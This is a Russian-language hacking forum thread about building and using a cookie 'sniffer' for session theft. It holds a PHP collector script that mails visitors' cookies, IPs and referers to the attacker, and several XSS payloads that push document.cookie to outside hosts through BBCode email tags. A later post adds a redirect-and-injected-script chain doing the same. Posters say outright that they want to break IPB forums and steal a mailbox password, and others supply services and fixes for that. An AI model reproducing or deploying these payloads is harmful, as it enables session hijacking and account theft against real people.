Установка сниффера

Discussion in 'PHP' started by Diablo, 10 Dec 2005.

  1. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    такой же врядли, его писали админы и врядли будет бесплатная раздача (да и платная тоже) - а зачем тебе именно такой? тут для персонального сниффера много лишнего, проще словить куку и послать хозяину в письме с реферером и прочим.

    PHP:
    <?
    $mymail '[email protected]';

    $date date('d.m.y - H:i:s');
    $ip UrlDecode(getenv('REMOTE_ADDR'));
    $referer UrlDecode(getenv('HTTP_REFERER'));
    $query UrlDecode(getenv('QUERY_STRING'));
    $cookie=getenv('HTTP_COOKIE');

    mail("$mymail""Kyka npuIIIJIa"" Date and Time: $date\n IP: $ip\n Adress: $referer\n Query String: $query\n Cookie: $cookie");
    ?>
     
  2. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Отлино, крассивый кодик, мне даж очень помог, спаиб .::Gh0st::.
     
    1 person likes this.
  3. coco

    coco New Member

    Joined:
    11 Dec 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Мне бы любой сниффер который бы работал как с этим

    HTML:
    [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    Только картинки *ttp://antichat.ru/cgi-bin/s.jpg чтоб был мой адресс
     
  4. coco

    coco New Member

    Joined:
    11 Dec 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    А без ссылки както нельзя, чтоб я в подпись поставил и все.........
     
  5. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    coco Выражай свои мысли как-нибудь попонятнее, ок? Что ты имеешь ввиду? Хочешь засунуть в подпись скрипт сниффера??=)))))))))))))) Если я тебя правильно понял, то так нельзя. Делай, как сказал .::Gh0st::..
     
  6. coco

    coco New Member

    Joined:
    11 Dec 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Неее, я просто хочю зделать сниффер как на античат. Только чтоб он стоял на моем сервере, и я смог ломать Ipb через Xss что ты мне дал.
     
  7. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    http://s.netsec.ru/
    Вот тебе сниффер, хоть и не твой, но тебе должно хватить с головой.
     
  8. coco

    coco New Member

    Joined:
    11 Dec 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    А можно ли вставить это
    HTML:
    http://s.netsec.ru//s.gif?id=561
    в
    HTML:
    [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
     
  9. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    coco КОНЕЧНО МОЖНО! что за вопросы=))
     
  10. GaR1k[Sp]

    GaR1k[Sp] Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    175
    Likes Received:
    10
    Reputations:
    2
    www.s.netsec.ru
    Замечательный снифер, огромное спасибо его создателям!
     
  11. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    получишь
    HTML:
    [email]gh0st@gh0st[url=http://gh0st.gov`=`][/url].gov[/email] ` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/your_login/pic.gif?"+document.cookie);`
    регай себе PS - personal sniffer и там свой логин (your_login) указывай, впрочем там тебе твой линк на картинку дадут...
    на всякий лучай скажу, что бага не везде работает, так что не думай, что щас все должно ломаться...
     
    #31 byte57, 31 Dec 2005
    Last edited: 31 Dec 2005
  12. MashuK

    MashuK New Member

    Joined:
    29 Dec 2005
    Messages:
    11
    Likes Received:
    1
    Reputations:
    1
    .::Gh0st::.

    зафигачила скрипт в инет (хост поддерживает пхп)
    отправила ссылку на сайт на мыло. пришел только id текущей сессии, но это мне врядли поможет... ибо мне нужно узнать пароль от ящика, но который отправляется письмо. с остальными снифами та же трабла, шлет IP, ID, еще какую то хрень, но пасс не шлет. я вообщето, даже и на хэш пасса согласна :p , дешифровщиком тьма..
    добавь пожалуйста в свой скрипт фунцию тырения пароля ))
    ---------------------
    + наставлю, не вапрос! ;)
     
  13. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    суть в том, что нужно не просто ссылку заслать, а выполнить javascript в контексте уязвимого сайта и послать куки на свой скрипт. просто зайти поссылке - результата не даст.
     
  14. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    А чё за она?
    Покажи что написанно.
     
  15. pitter

    pitter New Member

    Joined:
    2 Oct 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    привет можете обьяснить не получаеться кое что

    <?
    $mymail = '[email protected]';

    $date = date('d.m.y - H:i:s');
    $ip = UrlDecode(getenv('REMOTE_ADDR'));
    $referer = UrlDecode(getenv('HTTP_REFERER'));
    $query = UrlDecode(getenv('QUERY_STRING'));
    $cookie=getenv('HTTP_COOKIE');

    mail("$mymail", "Kyka npuIIIJIa", " Date and Time: $date\n IP: $ip\n Adress: $referer\n Query String: $query\n Cookie: $cookie");
    ?>

    это скрипт

    я пишу два скрипта

    index.php
    <script>document.location.href="уязвимость=%22%3E%3Cscript%20src=http://vkontaktes.h16.ru/js.js%3E%3C/script%3E"</script>
    js.js
    img=new Image(); img.src="http://vkontaktes.h16.ru/1.php"+document.cookie;

    1.php- это для прихода куков на мыло
    куки не идут на мыло и приходит токо айпи
     
  16. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    кто скажет или снимет видео как на сайт установить сниффер?
     
  17. pitter

    pitter New Member

    Joined:
    2 Oct 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    ты для начала исходники хорошие найди
     
  18. pitter

    pitter New Member

    Joined:
    2 Oct 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    а то исходников много а есть и не рабочие!!!
     
  19. _==wolf==_

    _==wolf==_ Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    127
    Likes Received:
    38
    Reputations:
    6
    например как твои исходники. ты сейвишь куки своего сайта а надо из query стринг так что убирай ваще то что $cookie=getenv('HTTP_COOKIE'); и тд. а вообще... за археологию банят